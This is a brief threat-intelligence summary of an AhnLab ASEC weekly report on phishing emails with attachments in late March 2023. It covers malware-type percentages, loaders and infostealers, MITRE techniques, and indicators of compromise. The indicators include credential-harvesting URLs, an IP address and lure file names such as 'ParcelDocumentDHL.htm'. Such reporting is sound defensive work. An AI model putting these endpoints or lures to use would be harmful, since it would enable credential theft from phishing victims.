ASEC tracked phishing email threats for the week of March 26 to April 1, 2023, focusing on attachments and detailing distribution cases across FakePage, Downloader, Infostealer, Backdoor, Worm, and Trojan variants. FakePage was the dominant method (59%), accompanied by loaders like SmokeLoader/GuLoader and infostealers such as AgentTesla and FormBook, with Korean-targeted cases and a highlighted “PDF Online” keyword guiding caution. #FakePage #SmokeLoader #GuLoader #AgentTesla #FormBook #DHLExpress #FedEx #PDFOnline #C2
Keypoints
- The report covers phishing emails with attachments distributed during March 26–April 1, 2023, excluding cases with only malicious links.
- FakePage attachments accounted for 59% of incidents, involving mimicry of login pages to harvest credentials.
- Downloader infections (22%) featured loaders such as SmokeLoader and GuLoader.
- Infostealers (7%) like AgentTesla and FormBook were observed, stealing credentials from browsers, emails, and FTP clients.
- Other malware types detected include Backdoor (4%), Worm (4%), and Trojan (3%).
- File extensions for attachments included HTML/HTM/SHTML for FakePage and ZIP, 7Z, GZ, IMG, DOCX for other malware.
MITRE Techniques
- [T1598] Phishing for Information – Used as reconnaissance via phishing emails to obtain credentials. “Phishing for Information (Reconnaissance, ID: T1598[1])”
- [T1566] Phishing – Initial Access – Employed to gain initial access through deceptive emails. “Phishing (Initial Access, ID: TI1566[2])”
- [T1534] Internal Spearphishing – Lateral Movement – Leveraged spearphishing within internal contexts to move laterally. “Internal Spearphishing (Lateral Movement, ID: T1534[3])”
Indicators of Compromise
- [URL/Domain] context – https://formspree.io/f/myyazkbv, https://naturaverdebeauty.com/justld/next.php, and 2 more URLs
- [IP Address] context – 192.185.224.69
- [File Names] context – ParcelDocumentDHL.htm, 24_153_IBXX 2307_54210_project order.htm
Read more: https://asec.ahnlab.com/en/51222/